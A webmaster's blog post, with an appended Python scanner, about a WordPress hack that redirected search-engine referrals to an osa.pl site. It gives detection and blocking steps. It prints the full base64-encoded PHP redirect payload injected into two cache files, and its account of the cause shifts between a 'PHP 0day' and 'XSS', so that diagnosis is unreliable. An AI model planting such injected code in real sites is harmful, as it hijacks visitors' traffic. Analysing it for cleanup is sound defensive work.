Late last night I realized that the traffic for Question-Defense.com was way down for the day and thought it was related to some recent updates I had performed on the site. I spent probably an hour or so last night verifying that nothing was out of the ordinary with the site and wasn’t able to find any issues. Upon waking up this morning the traffic was again extremely low for this time of day, even for a Saturday, so we started to investigate. One of the referrers whose traffic had dramatically decreased was Google, so we went to Google and performed a search that we knew would return a link to Question-Defense.com. Sure enough, upon clicking the link in the Google results we hit the question-defense.com URL and were immediately redirected to finditnow.osa.pl. Below we describe the issue in more detail, provide specifics about how our site was hacked, and provide the information needed to locate and resolve the problem.

*** UPDATE ** PLEASE READ ** LIKELY NOT A VIRUS/SPYWARE/MALWARE ***





If you found this article because you were redirected to the finditnow.osa.pl site and thought your computer had been infected with some form of virus, spyware, or malware, that is likely not the case. Instead, the site you were trying to visit has likely been exposed to a PHP 0day vulnerability which can easily be resolved if the webmaster of the site is aware of the issue. You can also visit the site directly, as only search results are being redirected by the hack that was performed. So please visit the site directly and contact the webmaster via the site's contact form to let them know you believe their site has been hacked. You can either explain the issue to them or send them the link to this article to let them know how they can resolve the issue, and you will have done your good deed for the day!





*** UPDATE 2 ***





I don’t believe this is a bug with PHP anymore but do believe that this is an XSS attack which you can defend against using the .htaccess file located in the root of your site. If you are using WordPress you can accomplish this using the Bulletproof Security plugin, which can be downloaded from the WordPress Plugins site. If you are using another type of software, the .htaccess entry below will send back a 403 Forbidden response when the attempt to hack your site is made.





.htaccess Entry To Block XSS Attack:

```apache
# Return 403 Forbidden when the query string carries a base64_encode(...) call.
# The [OR] flag only belongs on a condition that is followed by another RewriteCond;
# on a lone condition it makes the rule fire for every request, so it is omitted here.
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC]
RewriteRule ^(.*)$ - [F,L]
```

How We Located The finditnow.osa.pl Hack:

Again, after spending some time looking over recent updates to the question-defense.com site, we wanted to see this from a customer's perspective and went to Google to perform a search. The search we performed is noted below.

Search Performed On Google:

```text
xbox 360 : your nat type is moderate
```

So when clicking the link returned by Google, which happened to be the third result, we hit the question-defense.com link provided but were immediately redirected to finditnow.osa.pl, as shown in the example picture below.

Google Search Results Hijacked By finditnow.osa.pl:

When everything is functioning properly the QD results from Google should have sent the customer to the below page instead. You will notice that the hack is clever by taking the results from Google and redirecting to a new page with results on the same subject.

Google Search Results Not Hijacked By finditnow.osa.pl:

So we were able to trace the issue to the site itself. After a short amount of time we located the PHP 0day in PHP 5.2.X which allows people to modify files hosted on the server running PHP 5.2.X. In this example the hackers performing the 0day used a clever way to generate traffic for the osa.pl domain without redirecting all traffic: they overwrote only two files on a web site running WordPress so that only traffic from search engines is redirected. This is really clever for numerous reasons, including the fact that when you are attempting to locate the cause of a drop in traffic to your site you are likely to go directly to your site, and it will appear to function without issue. Until you perform a Google search, or a search using another search engine such as Bing, Yahoo, Baidu, Search, etc., you will think everything is working without issue.

Fix finditnow.osa.pl Hack On WordPress Site:

First off you should upgrade PHP from version 5.2.X to 5.3.X immediately, which will stop the 0day from being performed on your site again. On CentOS Linux you can simply type “yum update php” to upgrade PHP. Make sure the upgrade takes you to 5.3.X and, if not, search for a Yum repo that does include a 5.3.X version of PHP. After upgrading PHP, which can be done using numerous different repositories such as CHL, Atomic, and numerous others, you should look in the wp-content directory located in the root of your WordPress site. The files modified in our case included advanced-cache.php and wp-cache-config.php; however, it may be these same files or others on your site, so you should use the command below from the root of your web site to locate all of the modified files.

Search For Modified Files That Redirect Users To finditnow.osa.pl:

```bash
grep -r "eval(base64_decode" *
```

The above search, run from the root of your web site at the Linux command line, should return any infected files, which again on our WordPress site were advanced-cache.php and wp-cache-config.php only. Below is the snippet of PHP code added to the top of each file that performed the redirect to finditnow.osa.pl.

PHP Code Used To Redirect Users To finditnow.osa.pl:

```php
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZmVyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2J1eW9yZGllLm9zYS5wbC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCn0="));
```

The above code was inserted directly after “<?php” at the top of each of the modified files. Decoded, the payload reads HTTP_REFERER, checks it for “yahoo”, “google” or “bing”, and if one matches sends a Location header pointing at an osa.pl address and exits, which is why direct visits to the site were unaffected. Once the code was removed, traffic coming from Google immediately started working again. Again, make sure you upgrade PHP 5.2.X to PHP 5.3.X, because if not your site will continue to be manipulated in this manner and you will lose all of your search engine traffic.
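As an added example (not code from the original post), here is a Python triage script that does what the grep above does and goes one step further: it finds eval(base64_decode("...")) wrappers in every .php file under a web root, decodes each blob, and flags the markers this hack relied on, a search-engine referer check followed by a Location header. The sample web root it builds, the payload text and the redirect host are constructed for the demonstration and are not taken from the page.

```python
import base64
import re
import tempfile
from pathlib import Path

# The injected wrapper eval(base64_decode("...")), tolerating whitespace and either quote style.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)', re.I)
# What the page's decoded payload relied on: a search-engine referer check, then a redirect header.
REDIRECT_MARKERS = ("HTTP_REFERER", "Location:", "google", "yahoo", "bing")

def decode_payload(blob):
    """Decode one captured blob, restoring any '=' padding that was dropped."""
    clean = re.sub(r"\s+", "", blob)
    return base64.b64decode(clean + "=" * (-len(clean) % 4)).decode("utf-8", "replace")

def scan_file(path):
    """One finding per eval(base64_decode(...)) in a PHP file, with the payload decoded."""
    findings = []
    source = Path(path).read_text(encoding="utf-8", errors="replace")
    for m in EVAL_B64.finditer(source):
        try:
            decoded = decode_payload(m.group(1))
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = "<undecodable>"
        hits = [mk for mk in REDIRECT_MARKERS if mk.lower() in decoded.lower()]
        findings.append({"file": str(path), "offset": m.start(), "decoded": decoded, "markers": hits})
    return findings

def scan_tree(root):
    """Walk a web root the way the page's recursive grep does, checking every *.php file."""
    results = []
    for php in sorted(Path(root).rglob("*.php")):
        results.extend(scan_file(php))
    return results

# Constructed sample (hypothetical, not the page's blob) mirroring the decoded logic; placeholder host.
SAMPLE_PAYLOAD = ('error_reporting(0);\n$r=$_SERVER["HTTP_REFERER"];\n'
                  'if (stristr($r,"google") or stristr($r,"yahoo") or stristr($r,"bing")) {\n'
                  '  header("Location: http://redirect-target.example/"); exit();\n}\n')

def build_sample_site():
    """Throwaway web root: one injected wp-content file plus one clean file."""
    root = Path(tempfile.mkdtemp(prefix="qd-scan-"))
    (root / "wp-content").mkdir()
    blob = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    (root / "wp-content" / "advanced-cache.php").write_text(
        '<?php eval(base64_decode("%s")); // injected after the opening tag\n' % blob)
    (root / "index.php").write_text("<?php echo 'clean';\n")
    return root
```

Point scan_tree() at the real web root (the directory the grep was run from) to triage a live site, or at build_sample_site() to see the decoded payload of the constructed sample; nothing is modified, so the decoded output can be reviewed before any file is cleaned.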
